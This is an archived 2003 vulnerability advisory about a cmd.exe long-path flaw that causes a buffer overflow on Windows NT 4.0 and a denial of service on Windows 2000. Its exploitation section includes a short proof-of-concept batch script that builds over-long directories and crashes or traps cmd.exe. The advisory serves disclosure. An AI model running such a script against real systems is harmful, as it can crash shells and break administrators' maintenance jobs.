SECURITY.NNOV: Windows NT 4.0/2000 cmd.exe long path buffer overflow/DoS

2003-02-11T00:00:00
ID SECURITYVULNS:DOC:4063
Type securityvulns
Reporter Securityvulns
Modified 2003-02-11T00:00:00

Description

Title: Buffer overflow/DoS against cmd.exe for Windows NT 4.0/2000 Affected: Microsoft Windows NT 4.0 (buffer overflow) Microsoft Windows 2000 (DoS) Vendor: Microsoft Risk: Average for Windows NT 4.0 Low for Windows 2000 Exploitable: Yes Remote: No Vendor Notified: January, 30 2003

I. Intro

cmd.exe is Windows NT OS family command processor. It's also used to process .bat and .cmd batch files. Many system administrator run batch files with elevated privileges for system maintenance.

II. Vulnerability

cmd.exe has a flow in processing cd command on long path name. On Windows NT 4.0 it may cause buffer overflow, on Windows 2000 - failure of batch file processing.

III. Details

NTFS file system allows to create paths of almost unlimited length. But Windows API does not allow path longer than 256 bytes. To prevent Windows API from checking requested path \\?\ prefix may be used for filename. This is documented feature of Windows API.

cmd.exe from Windows NT 4.0 has trivial buffer overflow in CD command if destination path is longer than 256 characters. This vulnerability may be trivially exploited to execute code.

cmd.exe from Windows 2000 has no buffer overflow, but than changing to directory with a path slightly longer than 256 characters (for example 260 characters) cmd.exe becomes "jailed" in this directory, it means cd .. command will fail. It may cause DoS against maintenance batch script.

IV. Exploitation

@echo off SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB mkdir \\?\c:\%A% mkdir \\?\c:\%A%\%A% mkdir \\?\c:\%A%\%B%\ c: cd \ cd AAAAAAAAAAAA cd AAAAAAAAAAAA cd BBBBBBBBBBBB* cd ..

creates directory with 2 subdirectory. First one demonstrates buffer overflow on Windows NT 4.0 (second cd AAAAAAAAA* command will crash cmd.exe with EIP overwritten) second one demonstrates cmd.exe to change directory to AA...\BB..., but cd .. command will fail.

V. Vendor

Microsoft acknowledged problem.

-- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)